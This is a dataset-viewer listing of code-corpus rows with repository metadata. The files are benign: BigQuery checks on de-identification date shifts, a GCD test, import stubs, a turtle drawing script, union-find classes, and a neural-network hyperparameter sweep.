# # 11 DS_11 Verify that the field identified to follow the date shift rule as de-identification action in CONDITION OCCURENCE table have been randomly date shifted.
# DS_11: condition_start_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.condition_start_date), DATE(d.condition_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.condition_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.condition_occurrence` d
ON i.condition_occurrence_id = d.condition_occurrence_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query11 Condition table', 'result': outcome},
               ignore_index=True)
df1
# # 12 DS_12 Verify that the field identified to follow the date shift rule as de-identification action in MEASUREMENT table have been randomly date shifted.
# +
# DS_12: measurement_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.measurement_date), DATE(d.measurement_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.measurement` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.measurement` d
ON d.measurement_id = i.measurement_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query12 Measurement', 'result': outcome},
               ignore_index=True)
df1
# -
# # 13 DS_13 Verify the date shift has been implemented following the date shift noted in the deid_map table in the non-deid dataset.
# DS_13: every recorded shift in the mapping table must be strictly positive.
query = f'''
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{pipeline}.pid_rid_mapping`
WHERE shift <=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means the check passed.
# BUG FIX: the fail branch labelled this check 'date shifited in non_deid'
# (typo) while the pass branch used 'date shifted in non_deid', so the same
# check appeared under two different names in the summary.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query13 date shifted in non_deid', 'result': outcome},
               ignore_index=True)
df1
# # 14 DS_14 Verify that person_id has been replaced by research_id
#
#
# checked total 8 tables including specimen etc tables in deid. However will be hard to check person or death tables without row_id.
# DS_14: in every deid table, person_id must equal the mapped research_id.
# Eight CTEs (one per table) each count mismatched rows; the final join on
# n_row_not_pass only returns a row when all eight counts are identical
# (in the passing case, all zero).
query = f'''
WITH df1 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.observation` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.observation` deid USING(observation_id)
WHERE deid.person_id !=m.research_id
),
df2 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.measurement` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.measurement` deid USING(measurement_id)
WHERE deid.person_id !=m.research_id
),
df3 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.condition_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.condition_occurrence` deid USING(condition_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df4 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.drug_exposure` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.drug_exposure` deid USING(drug_exposure_id)
WHERE deid.person_id !=m.research_id
),
df5 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.device_exposure` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.device_exposure` deid USING(device_exposure_id)
WHERE deid.person_id !=m.research_id
),
df6 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.procedure_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.procedure_occurrence` deid USING(procedure_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df7 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.visit_occurrence` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.visit_occurrence` deid USING(visit_occurrence_id)
WHERE deid.person_id !=m.research_id
),
df8 AS (
SELECT COUNT (*) AS n_row_not_pass
FROM `{project_id}.{com_cdr}.specimen` non_deid
JOIN `{project_id}.{pipeline}.pid_rid_mapping` m
ON m.person_id=non_deid.person_id
JOIN `{project_id}.{deid_cdr}.specimen` deid USING(specimen_id)
WHERE deid.person_id !=m.research_id
)
SELECT * FROM df1
JOIN df2 USING(n_row_not_pass)
JOIN df3 USING(n_row_not_pass)
JOIN df4 USING(n_row_not_pass)
JOIN df5 USING(n_row_not_pass)
JOIN df6 USING(n_row_not_pass)
JOIN df7 USING(n_row_not_pass)
JOIN df8 USING(n_row_not_pass)
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means the check passed.
# BUG FIX: both summary labels misspelled 'replaced' as 'replaed'.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query14.3 person_id replaced by research_id in other 8 tables',
                'result': outcome},
               ignore_index=True)
df1
# # Summary_dateshift
# if not pass, will be highlighted in red
# Convert empty / 'Null' results to NaN so that failed checks render as
# red-highlighted cells in the styled summary table below.
df = df.mask(df.isin(['Null','']))
df.style.highlight_null(null_color='red').set_properties(**{'text-align': 'left'})
| 34.893333
| 184
| 0.703223
| 2,493
| 15,702
| 4.225431
| 0.093061
| 0.050408
| 0.046896
| 0.028194
| 0.808715
| 0.784128
| 0.753275
| 0.713404
| 0.677425
| 0.607936
| 0
| 0.045785
| 0.150108
| 15,702
| 449
| 185
| 34.971047
| 0.743574
| 0.260986
| 0
| 0.623881
| 0
| 0.032836
| 0.700477
| 0.341309
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.119403
| 0.00597
| 0
| 0.00597
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
88f96c727c174f8ff8b1df34ccf4ee09c4f27ad0
| 374
|
py
|
Python
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 4
|
2018-09-18T09:02:03.000Z
|
2019-11-27T08:29:43.000Z
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 4
|
2018-10-12T13:32:43.000Z
|
2018-10-24T16:39:02.000Z
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 9
|
2018-10-12T14:11:26.000Z
|
2019-10-04T08:16:02.000Z
|
import pytest
import fractions
from misc import GCD
def test_gcd():
    """Check GCD.greatest_common_divisor against the stdlib reference."""
    # NOTE(review): fractions.gcd was deprecated in Python 3.5 and removed in
    # 3.9, so this test only runs on older interpreters.  math.gcd is the
    # modern replacement, but it differs on negatives (math.gcd always
    # returns >= 0 while fractions.gcd(-30, -50) == -10), so switching would
    # change the expected values -- confirm GCD's sign convention first.
    assert fractions.gcd(30,50) == GCD.greatest_common_divisor(30,50)
    assert fractions.gcd(55555,123450) == GCD.greatest_common_divisor(55555,123450)
    assert fractions.gcd(-30,-50) == GCD.greatest_common_divisor(-30,-50)
    assert fractions.gcd(-1234,1234) == GCD.greatest_common_divisor(-1234,1234)
| 37.4
| 81
| 0.762032
| 55
| 374
| 5.018182
| 0.309091
| 0.217391
| 0.26087
| 0.347826
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0
| 0.161677
| 0.106952
| 374
| 9
| 82
| 41.555556
| 0.664671
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.125
| true
| 0
| 0.375
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
000728ad494d547b467929484ab896b11b09fb47
| 201
|
py
|
Python
|
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | 2
|
2018-10-09T21:19:31.000Z
|
2018-10-10T12:41:26.000Z
|
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | null | null | null |
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | null | null | null |
from scopus.utils.create_config import *
from scopus.utils.get_content import *
from scopus.utils.get_encoded_text import *
from scopus.utils.startup import *
from scopus.utils.detect_id_type import *
| 33.5
| 43
| 0.825871
| 31
| 201
| 5.16129
| 0.451613
| 0.3125
| 0.46875
| 0.525
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099502
| 201
| 5
| 44
| 40.2
| 0.883978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc456ed9fa4a75fe205b73258c3f5d315de4a347
| 2,523
|
py
|
Python
|
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
def c3():
    """Prompt for three (x, y) coordinate pairs and store them in globals.

    The unused fourth point is zeroed so the transform code below can
    operate on x4/y4 unconditionally.
    """
    global x1
    global y1
    global x2
    global y2
    global x3
    global y3
    global x4
    global y4
    x1=float(input("What are your x1?"))
    y1=float(input("What are your y1?"))
    x2=float(input("What are your x2?"))
    y2=float(input("What are your y2?"))
    x3=float(input("What are your x3?"))
    y3=float(input("What are your y3?"))
    x4=0
    y4=0
def c4():
    """Prompt for four (x, y) coordinate pairs and store them in globals."""
    global x1
    global y1
    global x2
    global y2
    global x3
    global y3
    global x4
    global y4
    x1=float(input("What are your x1?"))
    y1=float(input("What are your y1?"))
    x2=float(input("What are your x2?"))
    y2=float(input("What are your y2?"))
    x3=float(input("What are your x3?"))
    y3=float(input("What are your y3?"))
    x4=float(input("What are your x4?"))
    y4=float(input("What are your y4?"))
def _apply_step(step_label):
    """Prompt for one transformation and apply it to the global coordinates.

    BUG FIXES vs. the original:
      * results are now assigned back -- the original computed ``x1*-1``,
        ``x1+i`` etc. and discarded the value, so no transformation was
        ever actually applied;
      * the rotation direction is compared against the follow-up answer
        ``i`` -- the original compared ``answer``, which still held "2",
        so neither rotation branch could ever run.
    """
    global x1, y1, x2, y2, x3, y3, x4, y4
    print(step_label)
    print("1-reflections")
    print("2-rotations")
    print("3-translations")
    answer = input("> ")
    if answer == "1":
        i = input("across what?")
        if i == "y":
            # Reflection across the y axis negates the x coordinates.
            x1, x2, x3, x4 = -x1, -x2, -x3, -x4
        elif i == "x":
            # Reflection across the x axis negates the y coordinates.
            y1, y2, y3, y4 = -y1, -y2, -y3, -y4
    if answer == "2":
        i = input("which way?")
        # NOTE(review): the swap-then-negate below reproduces the original
        # author's intent; whether the "90 cw" / "90 ccw" labels match the
        # mathematical rotation direction depends on the axis convention --
        # confirm with the author before relying on it.
        if i == "90 cw":
            x1, y1 = -y1, x1
            x2, y2 = -y2, x2
            x3, y3 = -y3, x3
            x4, y4 = -y4, x4
        if i == "90 ccw":
            x1, y1 = y1, -x1
            x2, y2 = y2, -x2
            x3, y3 = y3, -x3
            x4, y4 = y4, -x4
    if answer == "3":
        i = float(input("how many units right?"))
        i1 = float(input("how many units up?"))
        x1 += i
        x2 += i
        x3 += i
        x4 += i
        y1 += i1
        y2 += i1
        y3 += i1
        y4 += i1

# Read the coordinates (3 points zero-fills the fourth).
print("How many coordinates?")
print("3")
print("4")
answer = input("> ")
if answer == "3":
    c3()
elif answer == "4":
    c4()

# Apply two user-chosen transformations, then print the final points.
_apply_step("Step 1:")
_apply_step("Step 2:")
print("(",x1,",",y1,")")
print("(",x2,",",y2,")")
print("(",x3,",",y3,")")
print("(",x4,",",y4,")")
| 17.520833
| 43
| 0.520809
| 446
| 2,523
| 2.946188
| 0.103139
| 0.136986
| 0.149163
| 0.181126
| 0.896499
| 0.864536
| 0.864536
| 0.864536
| 0.864536
| 0.864536
| 0
| 0.130933
| 0.273484
| 2,523
| 144
| 44
| 17.520833
| 0.585925
| 0
| 0
| 0.873239
| 0
| 0
| 0.208003
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0
| 0
| 0.014085
| 0.105634
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aeabbe5f1fb6b9ae690a2222955b9802d9cb5603
| 147
|
py
|
Python
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 1
|
2021-01-18T08:18:22.000Z
|
2021-01-18T08:18:22.000Z
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 1
|
2020-09-18T20:46:11.000Z
|
2020-12-29T14:55:20.000Z
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 3
|
2020-09-12T15:32:11.000Z
|
2022-03-11T23:08:03.000Z
|
from pybpodapi.bpod import Bpod
from pybpodapi.state_machine import StateMachine
from pybpodapi.bpod.hardware.output_channels import OutputChannel
| 36.75
| 65
| 0.884354
| 19
| 147
| 6.736842
| 0.578947
| 0.304688
| 0.265625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 147
| 3
| 66
| 49
| 0.948148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aecd29a848ed2fc79f3bdd58691b93d7d31925ca
| 190
|
py
|
Python
|
postpost/api/models/__init__.py
|
PiterPy-Meetup/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 6
|
2018-12-21T18:18:26.000Z
|
2019-02-23T11:20:53.000Z
|
postpost/api/models/__init__.py
|
JaradC42/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 78
|
2019-03-02T11:52:45.000Z
|
2020-03-11T02:25:28.000Z
|
postpost/api/models/__init__.py
|
JaradC42/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 2
|
2019-05-06T08:17:50.000Z
|
2019-10-18T03:23:25.000Z
|
from api.models.attachments import Attachment # noqa: F401
from api.models.platform_settings import PlatformPost # noqa: F401
from api.models.publications import Publication # noqa: F401
| 47.5
| 67
| 0.810526
| 25
| 190
| 6.12
| 0.52
| 0.137255
| 0.254902
| 0.196078
| 0.27451
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054217
| 0.126316
| 190
| 3
| 68
| 63.333333
| 0.86747
| 0.168421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4e1bca777757939170e9e4b14993ce21aaf0b6b6
| 79
|
py
|
Python
|
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
from turtle import *
fd(100)  # bottom edge: 100 units
rt(90)
fd(50)   # right edge: 50 units
rt(80)   # these two turns total 90 degrees
rt(10)
fd(100)  # top edge
rt(90)
fd(50)   # left edge -- NOTE(review): this traces a 100x50 rectangle,
         # not a square, despite the repository name
| 7.9
| 20
| 0.632911
| 19
| 79
| 2.631579
| 0.526316
| 0.2
| 0.28
| 0.36
| 0.52
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0.268657
| 0.151899
| 79
| 9
| 21
| 8.777778
| 0.477612
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e347026aac844642062524c564ed75e6f3cc5c3
| 1,429
|
py
|
Python
|
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
class SetUnionRank:
    """Disjoint-set (union-find) with union by rank, no path compression.

    Elements are 1-based ids; the parent of element ``i`` is stored at
    ``parents[i - 1]``.  The constructor keeps a reference to ``arr``
    (it is mutated in place by ``union``).
    """

    def __init__(self, arr):
        self.parents = arr
        self.ranks = [0] * self.size

    @property
    def size(self):
        """Number of elements tracked by the structure."""
        return len(self.parents)

    def find(self, i):
        """Return the root id of the set containing ``i``."""
        parent = self.parents[i - 1]
        while parent != i:
            i = parent
            parent = self.parents[i - 1]
        return i

    def union(self, i, j):
        """Merge the sets containing ``i`` and ``j`` using union by rank."""
        root_i = self.find(i)
        root_j = self.find(j)
        if root_i == root_j:
            return  # already in the same set
        if self.ranks[root_i - 1] > self.ranks[root_j - 1]:
            # Attach the shallower tree (j's) under the deeper root.
            self.parents[root_j - 1] = root_i
        else:
            self.parents[root_i - 1] = root_j
            # Equal ranks: the merged tree under root_j grows one level.
            if self.ranks[root_i - 1] == self.ranks[root_j - 1]:
                self.ranks[root_j - 1] += 1
class SetUnionRankPathCompression:
    """Disjoint-set with union by rank AND path compression.

    Same 1-based layout as ``SetUnionRank``: the parent of element ``i``
    lives at ``parents[i - 1]``.  ``find`` re-points every node on the
    walked path directly at the root.
    """

    def __init__(self, arr):
        self.parents = arr
        self.ranks = [0] * self.size

    @property
    def size(self):
        """Number of elements tracked by the structure."""
        return len(self.parents)

    def find(self, i):
        """Return the root of ``i``'s set, compressing the path on the way."""
        root = self.parents[i - 1]
        if root != i:
            root = self.find(root)
            self.parents[i - 1] = root  # path compression
        return root

    def union(self, i, j):
        """Merge the sets containing ``i`` and ``j`` using union by rank."""
        root_i = self.find(i)
        root_j = self.find(j)
        if root_i == root_j:
            return  # already in the same set
        if self.ranks[root_i - 1] > self.ranks[root_j - 1]:
            self.parents[root_j - 1] = root_i
        else:
            self.parents[root_i - 1] = root_j
            # Equal ranks: the merged tree under root_j grows one level.
            if self.ranks[root_i - 1] == self.ranks[root_j - 1]:
                self.ranks[root_j - 1] += 1
| 25.981818
| 64
| 0.496851
| 214
| 1,429
| 3.158879
| 0.107477
| 0.227811
| 0.142012
| 0.115385
| 0.890533
| 0.766272
| 0.766272
| 0.766272
| 0.766272
| 0.766272
| 0
| 0.026637
| 0.369489
| 1,429
| 54
| 65
| 26.462963
| 0.72364
| 0
| 0
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.045455
| 0.363636
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9de9c361ca2ab17edf94290aef0d1ffb329ae41d
| 2,452
|
py
|
Python
|
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as plt
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from src.data import Data
import time
from sklearn import neural_network
from sklearn.metrics import classification_report, accuracy_score, make_scorer
from sklearn.model_selection import ShuffleSplit, cross_val_score
from src.data import Data
# data = Data()
# min_estimators = 1
# max_estimators = 300
# train_scores = []
# test_scores = []
#
# x, y = data.get_data(data.CROP_DIR)
# nn = neural_network.MLPClassifier(hidden_layer_sizes=(0, ), max_iter=10, alpha=1e-4,
# solver='sgd', verbose=10, random_state=1, learning_rate_init=.1)
# for i in range(min_estimators, max_estimators + 1, 20):
# nn.set_params(hidden_layer_sizes=(i, ))
# nnn=nn.fit(x, y)
# train_scores.append(np.mean(cross_val_score(nnn, x, y, cv=3)))
# #test_scores.append(randomForest.score(x, y))
#
# fig, ax = plt.subplots(dpi = 100)
# ax.set_xlabel("hide_layer")
# ax.set_ylabel("accuracy")
# ax.set_title("Accuracy vs estimators for training and testing sets")
# ax.plot(range(min_estimators, max_estimators + 1, 20), train_scores, label="train",
# drawstyle="steps-post")
# #ax.plot(range(min_estimators, max_estimators + 1, 5), test_scores, label="test",
# # drawstyle="steps-post")
# ax.legend()
# plt.show()
# print("Finish")
#
#
# Sweep the size of the MLP's second hidden layer (first layer fixed at
# 100 units) and plot mean 3-fold cross-validation accuracy per size.
data = Data()
min_estimators = 1
max_estimators = 100
train_scores = []
test_scores = []  # unused below; kept from the commented-out experiment above
# x: feature matrix, y: labels, loaded from the cropped-image directory.
x, y = data.get_data(data.CROP_DIR)
# NOTE(review): the initial (100, 0) layer shape looks invalid for an MLP,
# but set_params replaces it before the first fit, so it is never used —
# confirm this is intentional.
nn = neural_network.MLPClassifier(hidden_layer_sizes=(100,0), max_iter=10, alpha=1e-4,
                                  solver='sgd', verbose=10, random_state=1, learning_rate_init=.1)
# Second-layer widths tried: 1, 21, 41, 61, 81.
for i in range(min_estimators, max_estimators + 1, 20):
    nn.set_params(hidden_layer_sizes=(100,i))
    nnn=nn.fit(x, y)
    # Record mean 3-fold CV accuracy for this layer width.
    train_scores.append(np.mean(cross_val_score(nnn, x, y, cv=3)))
    #test_scores.append(randomForest.score(x, y))
# Plot accuracy against the swept layer width.
fig, ax = plt.subplots(dpi = 100)
ax.set_xlabel("hide_layer")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs estimators for training and testing sets")
ax.plot(range(min_estimators, max_estimators + 1, 20), train_scores, label="train",
        drawstyle="steps-post")
#ax.plot(range(min_estimators, max_estimators + 1, 5), test_scores, label="test",
#        drawstyle="steps-post")
ax.legend()
plt.show()
print("Finish")
| 32.693333
| 86
| 0.707586
| 367
| 2,452
| 4.525886
| 0.269755
| 0.062613
| 0.065021
| 0.075858
| 0.852498
| 0.815172
| 0.815172
| 0.773028
| 0.732089
| 0.732089
| 0
| 0.027079
| 0.156607
| 2,452
| 74
| 87
| 33.135135
| 0.776112
| 0.459625
| 0
| 0.0625
| 0
| 0
| 0.072981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.34375
| 0
| 0.34375
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.